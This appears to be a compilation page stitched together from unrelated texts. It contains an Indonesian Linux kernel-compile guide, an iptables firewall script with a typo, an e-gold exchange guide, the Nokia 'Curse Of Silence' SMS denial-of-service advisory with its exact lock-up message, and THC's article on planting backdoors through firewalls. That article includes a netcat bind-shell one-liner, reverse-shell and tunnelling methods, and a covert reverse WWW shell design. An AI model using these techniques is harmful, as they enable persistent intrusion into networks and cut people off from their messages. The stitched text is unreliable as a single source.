Selain itu saya melakukan penambahan penandaan sesuai kebutuhan saya, misal [*] untuk menggunakan module, penandaan untuk ppp atau <*> untuk sb16 saya. ini tentu sesuai dengan kebutuhan anda.
Note: Pastikan pemilihan dilakukan sesuai dengan kebutuhan komputer anda, dan pemilihan menjadi module di lakukan karena penggunaannya dilakukan hanya pada waktu-waktu tertentu saja.

Utility Module
Berikut ini adalah utility yang saya gunakan dalam menangani module
1. lsmod digunakan untuk melihat module yang telah di load.
contoh: # lsmod

2. depmod digunakan untuk membuat dependency list module-module yang ada kepada sistem.
contoh: # depmod -a
Bila anda tidak menjalankan perintah ini anda tidak dapat meload module. perinatah "depmod -a" menghasilkan file /lib/modules/2.0.xx/modules.dep yang berisi daftar keterkatian module terhadap module yang lainnya.

3. modprobe digunakan untuk load/unload module
contoh: # modprobe -r msdos.o -->untuk unload module (menghapus)
contoh: # modprobe msdos.o -->untuk load module
command "modprobe msdos.o" bila dilihat dengan "lsmod" akan nampak seperti:

4. Module Pages Used by
5. msdos 2 0
6. fat 6 [msdos] 0

Perhatikan module fat juga diload, padahal perintah modprobe hanya diperin tahkan untuk meload module msdos. hal ini terjadi karena adanya ketergan tungan module, module msdos memerlukan module fat.
File-file (module) seperti msdos.o bisa dilihat di /lib/modules/2.0.xx/

7. kerneld merupakan daemon yang secara automatis meload dan unload module. dengan menggunakan kerneld kita tidak perlu lagi menggunakan modprobe (untuk load/unload module) secara manual karena daemon ini telah mena nganinya secara automatis.
Anda dapat mengecek apakah "kerneld" telah bekerja dengan baik. Misalnya anda memilih ppp sebagai module (ketika konfigurasi kernel), kemudian anda ketik command "lsmod", anda akan melihat bahwa module ppp belum di load, hal ini terjadi karena "kernel" belum membutuhkannya sehingga "kernel" tidak meminta "kerneld" meload module ppp. Kemudian anda melakukan proses koneksi ke isp (seperti yang biasa anda lakukan), setelah koneksi berhasil anda ketik "lsmod", kini anda dapat melihat bahwa module ppp telah diload.

Note: bila anda menginginkan menggunakan kerneld pastikan system startup script anda berisi baris /sbin/kerneld (atau check dengan command "ps ax", jika terdapat /sbin/kerneld berarti kerneld telah aktif). bila anda menggunakan RedHat 5.1 jalankan perintah "setup", kemudian pilih "ntsyssv" dan beri tanda [*] pada kerneld. dan jangan lupa sewaktu configurasi kernel (menuconfig) beri tanda [*] pada kernel daemon support.
Langkah-langkah compile kernel

o cd /usr/src
o tar -zxvf linux-2.0.zz.tar.gz (bila source belum di extract)
o cd /usr/src/linux
o make mrproper
o make menuconfig (bisa dengan config atau xconfig)
o make dep
o make clean
o make zImage (biasanya lama)
o make modules
o make modules_install
o cp arch/i386/boot/zImage /boot/vmlinuz-2.0.xx
o depmod -a
o (edit /etc/lilo.conf untuk menulis kernel yang baru dengan mengisi image=/boot/vmlinuz-2.0.xx, ikuti prosedur penulisan seperti yang telah ada)
o lilo (ketik lilo)
o shutdown -r now (reboot)

Good Luck

membuat gateway.sh

#!/bin/bash

# From: AHK
# To: linux-admin@linux.or.id

# Save this file and activate through # file_name start
# and de-activate through # file_name stop

# This firewall-script can be used for workstation, laptop, router
# or server that are not running network service (such as web server, ftp
# server etc)

# change the parameter UPLINK with Interface device to the Internet.
# In our case WLAN router with NIC eth0 connected to the Internet
# and LAN connection with eth1.
# if you use dial-up modem, you might use ppp0 as your UPLINK

UPLINK="eth1"

# if you run the gateway as router and forward IP packet between eth devices
# please fill “yes”, if not, please fill “no”

ROUTER="no"

# Please change “192.168.120.114" to your static IP address of UPLINK device.
# For those who use dial-up or dynamic IP, please enter “dynamic”

# NAT="192.168.120.114"

NAT="dynamic"

# please list all network interfaces including eth devices
# as well as dial-up interface such as ppp0

INTERFACES="lo eth0 eth1"

if [ "$1" = "start" ]
then
echo "Activate Firewall ..... "
/sbin/iptables -P INPUT DROP
/sbin/iptables -A INPUT -i ! ${UPLINK} -j ACCEPT
/sbin/iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
/sbin/iptables -A INPUT -p tcp -i ${UPLINK} -j REJECT --reject-with tcp-reset
/sbin/iptables -A INPUT -p udp -i ${UPLINK} -j REJECT --reject-with icmp-port-unreachable

# turn off ECN function
if [ -e /proc/sys/net/ipv4/tcp_ecn ]
then
echo 0 > /proc/sys/net/ipv4/tcp_en
fi

# turn off packet spoofing in all interfaces
for x in ${INTERFACES}
do
echo 1 > /proc/sys/net/ipv4/conf/${x}/rp_filter
done


if [ "$ROUTER" = "yes" ]
then
# Activate IP forwarding at router
echo 1 > /proc/sys/net/ipv4/ip_forward
if [ "$NAT" = "dynamic" ]
then
# Dynamic IP address, activate Masquerading
echo "Activate Masquerading (Dynamic IP) ...."
/sbin/iptables -t nat -A POSTROUTING -o ${UPLINK} -j MASQUERADE
elif [ "$NAT" != "" ]
then
# Static IP address use source NAT
echo "Activate SNAT (static IP) ...."
/sbin/iptables -t nat -A POSTROUTING -o ${UPLINK} -j SNAT --to ${NAT}
fi

fi

elif [ "$1" = "stop" ]
then
echo "Deactivate Firewall ..."
/sbin/iptables -F INPUT
/sbin/iptables -P INPUT ACCEPT
# Turn off NAT or MASQUERADING
/sbin/iptables -t nat -F POSTROUTING
fi

buy and jual e -gold

Cara menjual dan membeli E-Gold

Menjual E-Gold :
Siapkan email, E-Gold yang telah terisi Dollar dan rekening bank yang anda
gunakan untuk membuat account E-Gold Changer di www.indochanger.com.
Cek balance E-Gold anda di www.e-gold.com untuk memastikan berapa jumlah
Dollar yang akan anda jual menjadi Rupiah di www.indochanger.com.
Setelah login di www.indochanger.com, pilih menu JUAL untuk melakukan
transaksi penjualan E-Gold anda sesuai dengan jumlah balance E-Gold anda di
www.e-gold.com.
Setelah proses penjualan E-Gold di www.indochanger.com selesai, jangan lupa mereply
email yang dikirim www.indochanger.com ke email anda untuk konfirmasi
penjualan E-Gold yang anda lakukan.
Tunggu sesaat kira-kira 3 jam s/d 24 jam, kemudian periksa rekening bank anda
untuk memastikan apakah www.indochanger.com telah mentransfer Rupiah ke
rekening anda dari hasil penjualan E-Gold yang telah anda lakukan. Jika belum,
lakukan konfirmasi melalui telepon ke admin www.indochanger.com agar uang
anda segera di transfer. Jika sudah, anda bisa menikmati uang tersebut untuk
apa saja.
Membeli E-gold :
Siapkan 1 email. Anda Bisa membuat email gratis di YAHOO (
http://mail.yahoo.com ) atau GMAIL ( http://gmail.com ) .
Setelah email siap, buatlah account E-Gold di www.e-gold.com secara gratis.
Nomor E-Gold yang anda buat akan dikirim melalui email yang anda gunakan
untuk mendaftar di www.e-gold.com tersebut.
Selanjutnya, siapkan sebuah rekening bank untuk membuat account E-Gold
Changer di www.indochanger.com secara gratis. Account ini digunakan untuk
menukar Rupiah menjadi Dollar berbentuk E-Gold atau sebaliknya. Setelah
account E-Gold Changer di www.indochanger.com siap, jangan lupa meng-klik link
aktivasi yang dikirim melalui email yang anda gunakan untuk mendaftar di
situs ini. Link aktivasi ini diperlukan untuk mengaktifkan account anda agar
dapat digunakan untuk membeli atau menjual E-Gold di situs ini.
56
Berikutnya, silahkan pesan E-Gold di www.indochanger.com sebesar yang anda
inginkan dengan cara login terlebih dahulu ke dalam account E-Gold Changer
anda di www.indochanger.com. Misal anda ingin membeli E-Gold sebesar $255,
maka E-Gold yang harus anda pesan adalah $256. $1 digunakan untuk
mengatasi biaya transfer E-Gold. Jangan lupa memperhatikan kurs JUAL/BELI
yang tertera di pojok kanan atas web tersebut untuk memastikan jumlah uang
yang harus anda keluarkan untuk membeli E-Gold.
Note :
► KURS BELI digunakan untuk membeli E-Gold.
► KURS JUAL digunakan untuk menjual E-Gold.
Setelah pemesanan E-Gold sukses, cek email anda kemudian reply email yang
dikirim www.indochanger.com untuk konfirmasi pemesanan E-Gold. Bila perlu
lakukan konfirmasi via telepon agar E-Gold yang anda pesan segera di transfer
ke account E-Gold anda.
Sesaat setelah E-Gold anda pesan, www.indochanger.com akan mentransfer E-Gold
sebesar yang anda pesan ke dalam account E-Gold anda ( Biasanya kurang dari 3
jam ).
Kemudian login ke account E-Gold anda di www.e-gold.com.

e-gold account member

Sekilas Tentang E-Gold

Dalam setiap aktifitas e-bisnis, kita pasti membutuhkan suatu alat pembayaran digital dalam bertransaksi. Alat pembayaran digital ini disebut sebagai eCurrency yaitu alat pembayaran yang sah dan diterima secara umum di seluruh dunia, misalnya Credit Card. Namun pemakaian credit card melalui media internet masih banyak memunculkan masalah terutama tingkat keamanannya, apalagi Indonesia sekarang sudah dalam kondisi terblacklist oleh sebagian besar merchant-merchant internasional karena tingginya angka carding atau penyalah gunaannya di Indonesia. Sebagai alternatif untuk melakukan transaksi secara online di Internet kita dapat mempergunakan E-Gold.

Apa dan Bagaimana

E-gold adalah suatu alat pembayaran digital baru, dikeluarkan oleh e-gold Ltd., berkedudukan di Nevis , berlaku global, standar nilainya didasarkan pada 100% harga emas murni yang berlaku di pasar dunia seperti di http://www.kitco.com, dan ditampilkan dalam bentuk rekening tabungan e-gold. E-gold adalah suatu mata uang seperti halnya rupiah dan dollars, bukan merupakan mata uang nasional suatu negara. Ini berarti tidak ada suatu negara yang mengeluarkan uang kertas ataupun logam dalam mata uang e-gold. Malahan setiap transaksi dilakukan secara elektronis melalui internet. Nilai transaksi adalah berdasarkan berat emas murni. Anda dapat merubah e-gold ke dalam bentuk mata uang lain (US Dollars, Pounds , Deutche Mark..... dan sebaliknya). E-gold sudah diakui oleh banyak merchant di seluruh dunia dalam melakukan transaksi on-line, dan sebagai media pembayaran yang sah. Selain itu dana anda di E-gold dapat ditarik melalui ATM khusus di semua mesin ATM berlogo Cirrus, Maestro, dan Mastercard dapat dilihat di http://www.cashcards.net.

Manfaat dari e-gold antara lain

* Berbelanja online, misalnya di: goldstores.com
* Menyimpan emas secara praktis dan efisien
* Melakukan pembayaran dari orang ke orang
* e-commerce
* Payroll
* Membayar tagihan
* Menyumbang
* Spekulasi/trading, misalnya di www.gcitrading.com dan di www.betonmarkets.com


Anda dapat memanfaatkan rekening e-gold ini untuk menerima pembayaran dan melakukan pembayaran. E-gold memiliki website yang dijamin keamanannya dengan secure server 128 bit SSL. Anda dapat membuka rekening tanpa dikenakan biaya seperti halnya bila anda membuka rekening di bank, setelah itu anda dapat memasukkan dana anda ke rekening e-gold dengan cara membeli e-gold, dan sebaliknya anda dapat mencairkan dana e-gold anda dengan cara menjualnya. Transfer antar e-gold adalah Real Time, lansung sampai ke rekening tujuan.
E-gold mengenakan fee transfer yang dapat anda lihat di http://www.e-gold.com/newfees.html.

Cara Membuka Account

Klick disini untuk melakukan registrasi di website e-gold.
Klik I agree setelah anda membaca user agreement
Akan keluar form isian, anda hanya perlu mengisi yg dicetak tebal saja
Isi Account Name (nantinya ini yang dapat dilihat oleh user e-gold lainnya, memudahkan mereka untuk mem-verifikasi Nomor Account anda waktu melakukan transfer misalnya)
Contoh : Acc eGold Saya
Isi User Name (nantinya ini akan muncul di account history. Account Name dan User Name boleh anda buat sama untuk memudahkan anda mengingat)
Contoh : Acc eGold Saya
Isi Point of Contact (Nama, Alamat, Kota, State, ZIP)
Isi alamat Email ( Harus email yang aktif )
Isi nomor Telepon
Isi Alternate Passphrase (password) (ini berguna jika nantinya anda lupa passphrase / password anda atau untuk otomatisasi scripts )
Isi Passphrase (password) 2 kali (harus gabungan huruf dan angka panjang minimal 16 karakter (untuk keamanan)
Isi Turing Number sesuai dengan yang ditampilkan (turing number adalah nomor acak yang selalu berubah untuk menambah keamanan di website e-gold)
Klik Open
Nomor Account anda akan dikirim ke alamat email yang anda masukkan di atas
Buka email Anda dan cari email dari e-gold ( di inbox / bulk / spam folder ) dan catat Nomor Account anda (7 digit).

Cara mengakses account e-gold

Klick disini untuk masuk ke website e-gold
Isi Account Number sesuai yang telah dikirim ke email anda
Isi Passphrase (password) anda ( Sebaiknya anda menggunakan "SRK" untuk alasan keamanan )
Isi Turing Number sesuai dengan yang ditampilkan
Klik Login
Anda telah masuk ke e-gold account anda, menu yang disediakan adalah sbb.:
- Balance = untuk melihat saldo dana anda
- Spend = untuk mentransfer dana ke rekening e-gold lain
- Redeem = Mengambil atau menukar e-gold dengan emas batangan
- History = untuk melihat perincian transaksi
- Account Info = untuk merubah profile dan passphrase/password
Pastikan anda selalu Logout setelah selesai mengakses e-gold account anda untuk keamanan !!

Cara mengisi / menguangkan egold

Saat ini di Indonesia sudah ada beberapa exchanger e-gold dimana anda dapat membeli dan menjual/mencairkan dana dari rekening e-gold ke rekening bank anda.

serang Nokia

Affected Products
=================

All Nokia Series60 2.6, 2.8, 3.0, 3.1 devices, see detailed list at
the end of the document.


Requirements to Execute Attack
==============================

- MSISDN of the target
- mobile phone contract that allows sending of SMS messages
- (almost) any Nokia phone (or some other means of sending SMS
messages with TP-PID set to "Internet Electronic Mail")


Risk Level
==========

Medium (for S60 2.8 and 3.1 devices): Target will not be able to
receive any SMS or MMS messages while the attack is ongoing. After
that, only very limited message receiving is possible until the device
is Factory Resetted

High (for S60 2.6 and 3.0 devices): Target will not be able to receive
any SMS or MMS messages until the device is Factory Resetted


Summary
=======

Emails can be sent via SMS by setting the messages Protocol Identifier
to "Internet Electronic Mail" and formatting the message like this:



If such messages contain an with more than 32
characters, S60 2.6, 2.8, 3.0 and 3.1 devices are not able to receive
other SMS or MMS messages anymore. 2.6 and 3.0 devices lock up after
only one message, 2.8 and 3.1 devices after 11 messages.


Details
=======

3GPP TS 23.040 specifies a method for sending emails via SMS in
section 3.8 ("SMS and Internet Electronic Mail interworking"). In its
most basic form, such a SMS message starts with the from- (MT-SMS) or
to-email-address (MO-SMS), followed by a space character, and then the
message body. The TP-Procotol-Identifier of the SMS message has to be
set to "Internet Electronic Mail" (value: 50 / 0x32).

It is not specified how such a message should be displayed when
received by the phone. Before S60 2.6, Series60 devices displayed such
messages exactly as they were sent. Starting with S60 2.6, when the
part of the message that should contain the from-address looks
anything like an email address (i.e. it contains an "@" somewhere),
this address is then displayed as the message sender instead of the
usually shown TP-Originating-Address.

If this email address is longer than 32 characters, Series60 2.6, 2.8,
3.0 and 3.1 devices fail to display the message or give any indication
on the user interface that such a message has been received. They do,
however, signal to the SMSC that they received the message by sending
an RP-ACK.

Devices running S60 2.6 or 3.0 will not be able to receive any other
SMS message after that. The user interface does not give any
indication of this situation. The only action to remedy this situation
seems to be a Factory Reset of the device (by entering "*#7370#").

Devices running S60 2.8 or 3.1 react a little different: They do not
lock up until they received at least 11 SMS-email messages with an
email address that is longer than 32 characters. The device will not
be able to receive any other SMS message after that - upon receiving
the next message, the phone will just display a warning that there is
not enough memory to receive further messages and that data should be
deleted first. This message is even displayed on an otherwise
completely "empty" device.

After switching the phone off and on again, it has limited capability
for receiving SMS messages again: If it receives a SMS message that is
split up into several parts (3GPP TS 23.040, 9.2.3.24.1 Concatenated
Short Messages) it is only able to receive the first part and will
display the "not enough memory" warning again. After powercycling the
device again, it can then receive the second part. If there is a third
part, it has to be powercycled again, and so on.

Also, an attacker now just needs to send one more "Curse Of Silence"
message to lock the phone up again. By always sending yet another one
as soon as the status report for delivery of the previous message is
received, the attacker could completely prevent a target from
receiving any other SMS/MMS messages.

Only Factory Resetting the device will restore its full message
receiving capabilities. Note that, if a backup is made using Nokia
PC-Suite *after* being attacked, the blocking messages are also
backuped and will be sent to the device again when restoring the
backup after the Factory Reset.

Note that not being able to receive SMS messages also means not being
able to receive MMS messages, since they are signalled by sending an
SMS message to the device.

"Curse Of Silence" messages can be generated with any phone or
cellular modem that supports 3GPP TS 27.005 AT commands and with most
Nokia phones also directly from the user interface. For example, on
S60 devices, when in the message editor, the type of the message can
be switched to "E-mail" under "Options" -> "Sending options" ->
"Message sent as". The 6310i conveniently offers a "Write email" menu
entry in the messaging menu.

The simplest form of content for a Curse Of Silence would be something
like "123456789@123456789.1234567890123 " (the digits are used only to
illustrate the length of the "email address" of more than 32
characters). Note the space at the end of the message!


Workaround
==========

None known for the user side.

Until a firmware fix is available, network operators should filter
messages with TP-PID "Internet Electronic Mail" and an email address
of more than 32 characters or reset the TP-PID of these messages to 0.


Credits
=======

Tobias Engel
November 9, 2008

Many thanks to Frank Rieger for spending countless hours cutting and
editing the video.


Detailed List of Affected Products
==================================

Tested on several S60 2.6, 3.0 and 3.1 devices. Since the vulnerable
component is a S60 base functionality, it seems safe to assume that
all devices with these OS versions are affected.

S60 3rd Edition, Feature Pack 1 (S60 3.1):
Nokia E90 Communicator
Nokia E71
Nokia E66
Nokia E

Placing Backdoors Through Firewalls

Introduction

This article describes possible backdoors through different firewall architectures. However, the material can also be applied to other environments to describe how hackers (you?) cover their access to a system.

Hackers often want to retain access to systems they have penetrated even in the face of obstacles such as new firewalls and patched vulnerabilities. To accomplish this the attackers must install a backdoor which a) does it's job and b) is not easily detectable. The kind of backdoor needed depends on the firewall architecture used.

As a gimmick and proof-of-concept, a nice backdoor for any kind of intrusion is included, so have fun.




----[ Firewall Architectures

There are two basic firewall architectures and each has an enhanced version.

Packet Filters:

This is a host or router which checks each packet against an allow/deny ruletable before routing it through the correct interface. There are very simple ones which can only filter from the origin host, destination host and destination port, as well as good ones which can also decide based on incoming interface, source port, day/time and some tcp or ip flags.
This could be a simple router, f.e. any Cisco, or a Linux machine with firewalling activated (ipfwadm).

Stateful Filters:

This is the enhanced version of a packet filter. It still does the same checking against a rule table and only routes if permitted, but it also keeps track of the state information such as TCP sequence numbers. Some pay attention to application protocols which allows tricks such as only opening ports to the interiour network for ftp-data channels which were specified in a permitted ftp session. These filters can (more or less) get UDP packets (f.e. for DNS and RPC) securely through the firewall. (Thats because UDP is a stateless protocol. And it's more difficult for RPC services.)
This could be a great OpenBSD machine with the ip-filter software, a Cisco Pix, Watchguard, or the (in)famous Checkpoint FW-1.

Proxies / Circuit Level Gateways:

A proxy as a firewall host is simply any server which has no routing activated and instead has proxy software installe.
Examples of proxy servers which may be used are squid for WWW, a sendmail relay configuration and/or just a sockd.

Application Gateways:

This is the enhanced version of a proxy. Like a proxy, for every application which should get through the firewall a software must be installed and running to proxy it. However, the application gateway is smart and checks every request and answer, f.e. that an outgoing ftp only may download data but not upload any, and that the data has got no virus, no buffer overflows are generated in answers etc. One can argue that squid is an application gateway, because it does many sanity checks and let you filter stuff but it was not programmed for the installation in a secure environment and still has/had security bugs.
A good example for a freeware kit for this kind is the TIS firewall toolkit (fwtk).

Most firewalls that vendors sell on the market are hybrid firwalls, which means they've got more than just one type implemented; for example the IBM Firewall is a simple packet filter with socks and a few proxies. I won't discuss which firewall product is the best, because this is not a how-to-by-a-firewall paper, but I will say this: application gateways are by far the most secure firewalls, although money, speed, special protocols, open network policies, stupidity, marketing hype and bad management might rule them out.


----[ Getting in

Before we talk about what backdoors are the best for which firewall architecture we should shed a light on how to get through a firewall the first time. Note that getting through a firewall is not a plug-n-play thing for script-kiddies, this has to be carefully planned and done.

The four main possibilities:

Insider:

There's someone inside the company (you, girl/boy-friend, chummer) who installs the backdoor. This is the easiest way of course.

Vulnerable Services:

Nearly all networks offer some kind of services, such as incoming email, WWW, or DNS. These may be on the firewall host itself, a host in the DMZ (here: the zone in front of the firewall, often not protected by a firewall) or on an internal machine. If an attacker can find a hole in one of those services, he's got good chances to get in. You'd laugh if you'd see how many "firewalls" run sendmail for mail relaying ...

Vulnerable External Server:

People behind a firewall sometimes work on external machines. If an attacker can hack these, he can cause serious mischief such as the many X attacks if the victim uses it via an X-relay or sshd. The attacker could also send fake ftp answers to overflow a buffer in the ftp client software, replace a gif picture on a web server with one which crashs netscape and executes a command (I never checked if this actually works, it crashs, yeah, but I didn't look through this if this is really an exploitable overflow). There are many possibilities with this but it needs some knowledge about the company. However, an external web server of the company is usually a good start. Some firewalls are configured to allow incoming telnet from some machines, so anyone can sniff these and get it. This is particulary true for the US, where academic environments and industry/military work close together.

Hijacking Connections:

Many companies think that if they allow incoming telnet with some kind of secure authentication like SecureID (secure algo?, he) they are safe. Anyone can hijack these after the authentication and get in ... Another way of using hijacked connections is to modify replies in the protocol implementation to generate a buffer overflow (f.e. with X).

Trojans:

Many things can be done with a trojan horse. This could be a gzip file which generates a buffer overflow (well, needs an old gzip to be installed), a tar file which tampers f.e. ~/.logout to execute something, or an executable or source code which was modified to get the hacker in somehow. To get someone running this, mail spoofing could be used or replacing originals on an external server which internal employees access to update their software regulary (ftp xfer files and www logs can be checked to get to know which files these are).




----[ Placing the Backdoors

An intelligent hacker will not try to put the backdoors on machines in the firewall segment, because these machines are usually monitored and checked regulary. It's the internal machines which are usually unprotected and without much administration and security checks.

I will now talk about some ideas of backdoors which could be implemented. Note that programs which will/would run on an stateful filter will of course work with a normal packet filter too, same for the proxy. Ideas for an application gateway backdoor will work for any architecture.
Some of them are "active" and others "passive". "Active" backdoors are those which can be used by a hacker anytime he wishes, a "passive" one triggers itself by time/event so an attacker has to wait for this to happen.

Packet Filters:

It's hard to find a backdoor which gets through this one but does not work for any other. The few ones which comes into my mind
is a) the ack-telnet. It works like a normal telnet/telnetd except it does not work with the normal tcp handshake/protocol but uses TCP ACK packets only. Because they look like they belong to an already established (and allowed) connection, they are permitted. This can be easily coded with the spoofit.h of Coder's Spoofit project (http://reptile.rug.ac.be/~coder).
b) Loki from Phrack 49/51 could be used too to establish a tunnel with icmp echo/reply packets. But some coding would be needed to to be done.
c) daemonshell-udp is a backdoor shell via UDP
(http://www.thc.org look for thc-uht1.tgz)
d) Last but not least, most "firewall systems" with only a screening router/firewall let any incoming tcp connection from the source port 20 to a highport (>1023) through to allow the (non-passive) ftp protocol to work. "netcat -p 20 target port-of-bindshell" is the fastest solution for this one.

Stateful Filters:

Here a hacker must use programs which initiates the connection from the secure network to his external 0wned server. There are many out there which could be used:
active:
tunnel from Phrack 52.
ssh with the -R option (much better than tunnel ... it's a legtimitate program on a computer and it encrypts the datastream). passive:
netcat compiled with the execute option and run with a time option to connect to the hacker machine (ftp.avian.org).
reverse_shell from the thc-uht1.tgz package (see above) does the same.

Proxies / Circuit Level Gateways:
If socks is used on the firewall, someone can use all those stuff for the stateful filter and "socksify" them. (www.socks.nec.com) For more advanced tools you'd should take a look at the application gateway section.

Application Gateways:
Now we get down to the interesting stuff. These beasts can be intelligent so some brain is needed.
active:
(re-)placing a cgi-script on the webserver of the company, which allows remote access. This is unlikely because it's rare that the webserver is in the network, not monitored/ checked/audited and accessible from the internet. I hope nobody needs an example on such a thing ;-)
(re-placing) a service/binary on the firewall. This is dangerous because those are audited regulary and sometimes even sniffed on permanent ...
Loading a loadable module into the firewall kernel wich hides itself and gives access to it's master. The best solution for an active backdoor but still dangerous. passive:
E@mail - an email account/mailer/reader is configured in a way to extract hidden commands in an email (X-Headers with weird stuff) and send them back with output if wanted/needed.
WWW - this is hard stuff. A daemon on an internal machine does http requests to the internet, but the requests are in real the answers of commands which were issued by a rogue www server in a http reply. This nice and easy beast is presented below (->Backdoor Example: The Reverse WWW Shell)
DNS - same concept as above but with dns queries and replies. Disadvantage is that it can not carry much data. (http://www.icon.co.za/~wosp/wosp.dns-tunnel.tar.gz, this example needs still much coding to be any effective)




----[ Backdoor Example: The Reverse WWW Shell

This backdoor should work through any firewall which has got the security policy to allow users to surf the WWW (World Wide Waste) for information for the sake and profit of the company.
For a better understanding take a look at the following picture and try to remember it onwards in the text:

+--------+ +------------+ +-------------+
|internal|--------------------| FIREWALL |--------------|server owned |
| host | internal network +------------+ internet |by the hacker|
+--------+ +-------------+
SLAVE MASTER

Well, a program is run on the internal host, which spawns a child every day at a special time. For the firewall, this child acts like a user, using his netscape client to surf on the internet. In reality, this child executes a local shell and connects to the www server owned by the hacker on the internet via a legitimate looking http request and sends it ready signal. The legitimate looking answer of the www server owned by the hacker are in reality the commands the child will execute on it's machine it the local shell. All traffic will be converted (I'll not call this "encrypted", I'm not Micro$oft) in a Base64 like structure and given as a value for a cgi-string to prevent caching.

Example of a connection:

Slave
GET /cgi-bin/order?M5mAejTgZdgYOdgIO0BqFfVYTgjFLdgxEdb1He7krj HTTP/1.0

Master replies with
g5mAlfbknz

The GET of the internal host (SLAVE) is just the command prompt of the shell, the answer is an encoded "ls" command from the hacker on the external server (MASTER). Some gimmicks:

The SLAVE tries to connect daily at a specified time to the MASTER if wanted; the child is spawned because if the shell hangs for whatever reason you can check & fix the next day; if an administrator sees connects to the hacker's server and connects to it himself he will just see a broken webserver because there's a Token (Password) in the encoded cgi GET request; WWW Proxies (f.e. squid) are supported; program masks it's name in the process listing ...

Best of all: master & slave program are just one 260-lines perl file ... Usage is simple: edit rwwwshell.pl for the correct values, execute "rwwwshell.pl slave" on the SLAVE, and just run "rwwwshell.pl" on the MASTER just before it's time that the slave tries to connect.

Well, why coding it in perl? a) it was very fast to code, b) it's highly portable and c) I like it. If you want to use it on a system which hasn't got perl installed, search for a similar machine with perl install, get the a3 compiler from the perl CPAN archives and compile it to a binary. Transfer this to your target machine and run that one.

The code for this nice and easy tool is appended in the section THE CODE after my last words. If you've got updates/ideas/critics for it drop me an email. If you think this text or program is lame, write me at root@localhost. Check out http://www.thc.org for updates.


----[ The Source

Grab it here ...

rwwwshell v2.0


----[ Security

Now it's an interesting question how to secure a firewall to deny/detect this. It should be clear that you need a tight application gateway firewall with a strict policy. email should be put on a centralized mail server, and DNS resolving only done on the WWW/FTP proxies and access to WWW only prior proxy authentication. However, this is not enough. An attacker can tamper the mailreader to execute the commands extracted from the crypted X-Headers or implement the http authentication into the reverse www-shell (it's simple). Also checking the DNS and WWW logs/caches regulary with good tools can be defeated by switching the external servers every 3-20 calls or use aliases.

A secure solution would be to set up a second network which is connected to the internet, and the real one kept seperated - but tell this the employees ... A good firewall is a big improvement, and also an Intrusion Detection Systems can help. But nothing can stop a dedicated attacker.

----[ Last Words

Have fun hacking/securing the systems ...
Greets to all guys who like + know me ;-) and especially to those good
chummers I've got, you know who you are.

Ciao...
van Hauser / [THC] - The Hacker's Choice


For further interesting discussions you can email me at
vh@reptile.rug.ac.be with my public pgp key blow:

Type Bits/KeyID Date User ID
pub 2048/CDD6A571 1998/04/27 van Hauser / THC

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i

mQENAzVE0A4AAAEIAOzKPhKBDFDyeTvMKQ1xx6781tEdIYgrkrsUEL6VoJ8H8CIU
SeXDuCVu3JlMKITD6nPMFJ/DT0iKHgnHUZGdCQEk/b1YHUYOcig1DPGsg3WeTX7L
XL1M4DwqDvPz5QUQ+U+VHuNOUzgxfcjhHsjJj2qorVZ/T5x4k3U960CMJ11eOVNC
meD/+c6a2FfLZJG0sJ/kIZ9HUkY/dvXDInOJaalQc1mYjkvfcPsSzas4ddiXiDyc
QcKX+HAXIdmT7bjq5+JS6yspnBvIZC55tB7ci2axTjwpkdzJBZIkCoBlWsDXNwyq
s70Lo3H9dcaNt4ubz5OMVIvJHFMCEtIGS83WpXEABRG0J3ZhbiBIYXVzZXIgLyBU
SEMgPHZoQHJlcHRpbGUucnVnLmFjLmJlPokAlQMFEDVE0D7Kb9wCOxiMfQEBvpAD
/3UCDgJs1CNg/zpLhRuUBlYsZ1kimb9cbB/ufL1I4lYM5WMyw+YfGN0p02oY4pVn
CQN6ca5OsqeXHWfn7LxBT3lXEPCckd+vb9LPPCzuDPS/zYNOkUXgUQdPo69B04dl
C9C1YXcZjplYso2q3NYnuc0lu7WVD0qT52snNUDkd19ciQEVAwUQNUTQDhLSBkvN
1qVxAQGRTwgA05OmurXHVByFcvDaBRMhX6pKbTiVKh8HdJa8IdvuqHOcYFZ2L+xZ
PAQy2WCqeakvss9Xn9I28/PQZ+6TmqWUmG0qgxe5MwkaXWxszKwRsQ8hH+bcppsZ
2/Q3BxSfPege4PPwFWsajnymsnmhdVvvrt69grzJDm+iMK0WR33+RvtgjUj+i22X
lpt5hLHufDatQzukMu4R84M1tbGnUCNF0wICrU4U503yCA4DT/1eMoDXI0BQXmM/
Ygk9bO2Icy+lw1WPodrWmg4TJhdIgxuYlNLIu6TyqDYxjA/c525cBbdqwoE+YvUI
o7CN/bJN0bKg1Y/BMTHEK3mpRLLWxVMRYw==
=MdzX
-----END PGP PUBLIC KEY BLOCK-----

----[ THE END